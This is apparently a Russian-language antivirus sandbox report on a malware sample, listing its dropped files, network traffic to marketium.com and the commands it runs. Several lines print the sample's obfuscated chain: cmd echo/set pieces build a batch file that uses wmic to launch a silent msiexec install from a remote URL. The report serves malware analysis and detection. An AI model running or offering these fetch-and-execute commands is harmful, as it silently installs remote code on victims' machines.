Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'm">%appdata%\pPuJDYb.bat&echo|set /p="siexec /i https://marketium.com/wp-configs.php /q'" >> %appdata%\pPuJDYb.bat&%appdata%\pPuJDYb.bat>%appdata%\pPu...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\ppujdyb.bat
- %APPDATA%\ppujdyb.log
- %TEMP%\1064894.cvr
Сетевая активность
TCP
- 'ma###tium.com':443
UDP
- DNS ASK ma###tium.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'm">%appdata%\pPuJDYb.bat&echo|set /p="siexec /i https://marketium.com/wp-configs.php /q'" >> %appdata%\pPuJDYb.bat&%appdata%\pPuJDYb.bat>%appdata%\pPu...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'm" 1>%APPDATA%\pPuJDYb.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="siexec /i https://marketium.com/wp-configs.php /q'" 1>>%APPDATA%\pPuJDYb.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i https://marketium.com/wp-configs.php /q'
- '<SYSTEM32>\msiexec.exe' /i https://marketium.com/wp-configs.php /q
